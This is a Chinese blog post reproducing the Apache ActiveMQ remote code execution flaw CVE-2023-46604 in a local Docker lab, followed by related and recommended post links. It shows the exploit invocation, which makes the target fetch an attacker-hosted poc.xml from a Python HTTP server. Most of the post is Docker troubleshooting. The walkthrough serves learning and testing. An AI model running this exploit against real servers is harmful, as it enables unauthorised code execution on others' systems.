root身份打开CVE-2023-46604目录终端执行代码:

docker compose up -d启动容器

成功访问ip:8161端口,此漏洞核心在61616端口

漏洞目录下有poc.xml文件,启动 HTTP 反连服务器

python3 -m http.server 6666

执行漏洞利用脚本

python3 poc.py 192.168.75.132 61616 http://ip:6666/poc.xml

此时反连服务器会有响应即为成功!

漏洞验证

执行docker exec cve-2023-46604-activemq-1 ls -l /tmp

看到activeMQ-RCE-success



漏洞复现成功!

复现中遇到的问题(可能会出现)

最初我在运行python3 poc.py 192.168.75.132 61616 http://192.168.75.132:6666/poc.xml命令时,

出现ConnectionRefusedError: [Errno 111] Connection refused错误(说白了就是docker没正常运行),

逐一排查后总结原因如下

docker日志报错主要是java.lang.NullPointerException/opt/activemq/bin/activemq: 1: ps: not found

解决方法:

docker compose down停止容器

编辑目录下的docker-compose.yml文件

在image和port中间添加一行command: sleep infinity

意思是临时改动启动命令,让容器启动后不退出

docker compose up -d启动容器

docker exec -it cve-2023-46604-activemq-1 /bin/sh进入docker容器的shell

apt-get update && apt-get install -y procps安装procps,Ubuntu默认安装

exit退出容器

把刚开始在docker-compose.yml文件下添加的command一行删除后

在文件里添加

environment:

- ACTIVEMQ_OPTS=-XX:-UseContainerSupport

强制禁用容器内的 cgroup 检测,避免触发空指针异常。

执行docker compose down

docker compose up -d重启容器

执行docker ps | grep activemq查看容器状态(应为UP)

执行docker logs cve-2023-46604-activemq-1查看日志(无报错)

重新成功执行python3 poc.py 192.168.75.132 61616 http://192.168.75.132:6666/poc.xml命令,

反连服务器会返回结果

CVE-2023-46604 Apache ActiveMQ 远程代码执行漏洞 (复现)的更多相关文章

  1. Apache log4j2 远程代码执行漏洞复现👻

    Apache log4j2 远程代码执行漏洞复现 最近爆出的一个Apache log4j2的远程代码执行漏洞听说危害程度极大哈,我想着也来找一下环境看看试一下.找了一会环境还真找到一个. 漏洞原理: ...

  2. Apache Kylin远程代码执行漏洞复现(CVE-2020-1956)

    Apache Kylin远程代码执行(CVE-2020-1956) 简介 Apache Kylin 是美国 Apache 软件基金会的一款开源的分布式分析型数据仓库.该产品主要提供 Hadoop/Sp ...

  3. Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088) 复现

    漏洞复现 直接写 shell 写 shell 的话,需要写在 admin 或者 api 中,也就是需要登录,没有密码的话完成不了写 shell 操作. 该环境默认的口令为 admin/admin. 访 ...

  4. Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)案例分析

    部署ActiveMQ运行环境 在linux上部署apache-activemq-5.10.0-bin.tar.gz 通过tar -zxvf  apache-activemq-5.10.0-bin.ta ...

  5. Apache Unomi 远程代码执行漏洞复现(CVE-2020-13942)

    一.漏洞描述 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验.在Apa ...

  6. Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现

    Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现  一.     漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方 ...

  7. Apache Log4j2远程代码执行漏洞攻击,华为云安全支持检测拦截

    近日,华为云安全团队关注到Apache Log4j2 的远程代码执行最新漏洞.Apache Log4j2是一款业界广泛使用的基于Java的日志工具,该组件使用范围广泛,利用门槛低,漏洞危害极大.华为云 ...

  8. Apache Log4j 远程代码执行漏洞源码级分析

    漏洞的前因后果 漏洞描述 漏洞评级 影响版本 安全建议 本地复现漏洞 本地打印 JVM 基础信息 本地获取服务器的打印信息 log4j 漏洞源码分析 扩展:JNDI 危害是什么? GitHub 项目 ...

  9. Tomcat/7.0.81 远程代码执行漏洞复现

    Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...

  10. Apache SSI 远程命令执行漏洞复现

    Apache SSI 远程命令执行漏洞复现 一.漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令. 使 ...

随机推荐

  1. Go 层级菜单树转 json 处理

    本篇是一个补充知识点, 目的是为了下篇的后台管理系统中, 菜单权限的接口进行铺垫一下. 同时也是做个笔记, 因为在很多地方都会用这种 "树结构" 来实现很多权限, 层级, 菜单的处 ...

  2. 极简版秒表(java GUI)

    package javaPractice; import javax.swing.*; import java.text.*; import java.util.*; import java.awt. ...

  3. 用 AI 实现一个 GBK/GB2312 转 UTF-8 工具:轻松解决文本编码转换难题(附完整源码)

    用 AI 实现一个 GBK/GB2312 转 UTF-8 工具:轻松解决文本编码转换难题 在处理历史文件或与不同系统交互时,我们经常会遇到 GBK 或 GB2312 编码的文本文件.虽然现在 UTF- ...

  4. 使用 frp 进行内网穿透

    frp 是一个开源的内网穿透工具,可以使外网设备访问内网防火墙后的设备/服务器. 比如可以买一个 99元/年 的阿里云低配 ECS,然后把自己相对高配的旧电脑放在家里. 家里的旧电脑通过 frp 连上 ...

  5. 腾讯云对象存储工具类和demo

    使用 package com.ruoyi; import java.io.File; public class mytest { private static String secretId = &q ...

  6. 网络 | Linux ping任何ip均出现 Destination Host Unreachable 排查思路与方法

    Linux ping任何地址出现 Destination Host Unreachable 基本的排错步骤如下: 1.ping 127.0.0.1ping的通说明tcp协议栈没有问题 2.ping 主 ...

  7. JuiceFS v1.3-Beta2:集成 Apache Ranger,实现更精细化的权限控制

    在大数据场景中,文件系统和应用组件的权限管理至关重要.在最新发布的 JuiceFS 社区版 v1.3-Beta 2 中,JuiceFS 引入了与 Apache Ranger 的集成,提供了更为灵活和细 ...

  8. Linux系统split对tar文件进行分片和压缩

    一.简单说明 在实际的使用场景中,我们可能对压缩过的tar包上传到某个服务器或者应用,会涉及超出服务器限制的文件大小.这里我们可以对此文件进行压缩.分片.合并. 二.实际操作 2.1 压缩包分片 这里 ...

  9. Vue2和Vue3的差异化(通俗易懂)

    一.相同点 响应式系统(Reactive) 两者都采用 "模板 + 响应式" 的开发模式,视图自动随着状态变化而更新. 都支持双向绑定(v-model).条件渲染(v-if/v-s ...

  10. Elastic学习之旅 (7) 聚合分析

    大家好,我是Edison. 上一篇:ES的Query DSL 什么是ES的聚合 Elastic除搜索之外,还提供针对ES数据的统计分析功能,具有较高的实时性. 通过聚合,我们可以得到一个数据的概览,它 ...